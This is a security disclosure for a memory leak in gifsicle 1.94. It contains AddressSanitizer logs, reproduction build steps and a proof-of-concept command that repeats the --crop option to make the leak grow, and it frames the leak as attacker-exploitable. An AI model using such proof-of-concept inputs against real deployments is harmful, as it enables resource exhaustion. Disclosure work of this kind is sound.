Description
Description
We found a memory leak error when running gifsicle with the "--crop 3,6+5x6 --crop-transparency" configuration options.
At the same time, because gifsicle does not check repeated assignments of the "--crop" configuration, each special assignment of the "--crop" configuration in the command line parameters will increase the memory leak by 48 bytes. **Therefore, the size of this memory leak can be infinite. **For example, an attacker can use "--crop 3,6+5x6" in the command line one hundred thousand times, which will cause a memory leak of 4800000 bytes while the program is running.
**Moreover, although gifsicle will raise a warning, it will still execute the program's processing steps for gif files normally and will not directly exit the program with an error. **This allows attackers to use gifsicle maliciously.
It should be noted that gifsicle(version 1.92-2) downloaded through apt-get may also trigger this vulnerability, which may endanger the system security of Debian users.
Location
Gif_Realloc: gifsicle/src/fmalloc.c:19:13
Affected Component: gifsicle/gifsicle
ASAN Log
./src/gifsicle --crop 3,6+5x6 --crop-transparency gifsiclepoc -o out.gif
=================================================================
==1919443==ERROR: LeakSanitizer: detected memory leaks
Direct leak of 48 byte(s) in 1 object(s) allocated from:
#0 0x494f79 in realloc (/afltest/gifsicle/src/gifsicle+0x494f79)
#1 0x4dc29c in Gif_Realloc /afltest/gifsicle/src/fmalloc.c:19:13
#2 0x7ffff7c4c082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
SUMMARY: AddressSanitizer: 48 byte(s) leaked in 1 allocation(s).As mentioned in the Description section, since gifsicle does not check repeated assignments of the "--crop" configuration parameter, we can increase the number of specific assignments to the "--crop" configuration parameter to cause more memory leaks.
./src/gifsicle --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop-transparency gifsiclepoc -o out.gif
=================================================================
==1919446==ERROR: LeakSanitizer: detected memory leaks
Direct leak of 4800 byte(s) in 100 object(s) allocated from:
#0 0x494f79 in realloc (/afltest/gifsicle/src/gifsicle+0x494f79)
#1 0x4dc29c in Gif_Realloc /afltest/gifsicle/src/fmalloc.c:19:13
#2 0x7ffff7c4c082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
SUMMARY: AddressSanitizer: 4800 byte(s) leaked in 100 allocation(s).Version
LCDF Gifsicle 1.94
Copyright (C) 1997-2023 Eddie Kohler
This is free software; see the source for copying conditions.
There is NO warranty, not even for merchantability or fitness for a
particular purpose.Reference
https://github.com/kohler/gifsicle
Actual Behavior
Memory leak
PoC
gifsiclepoc: https://github.com/Frank-Z7/z-vulnerabilitys/blob/main/gifsiclepoc
Reproduction
git clone https://github.com/kohler/gifsicle.git
cd gifsicle
autoreconf -i
CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" CXXFLAGS=" -fsanitize=address -fno-omit-frame-pointer -g" ./configure
make
./src/gifsicle --crop 3,6+5x6 --crop-transparency gifsiclepoc -o out.gifEnvironment
ubuntu:20.04
gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.2)
clang version 10.0.0-4ubuntu1
afl-cc++4.09
Credit
Zeng Yunxiang ([Huazhong University of Science and Technology](http://cse.hust.edu.cn/))
Song Jiaxuan

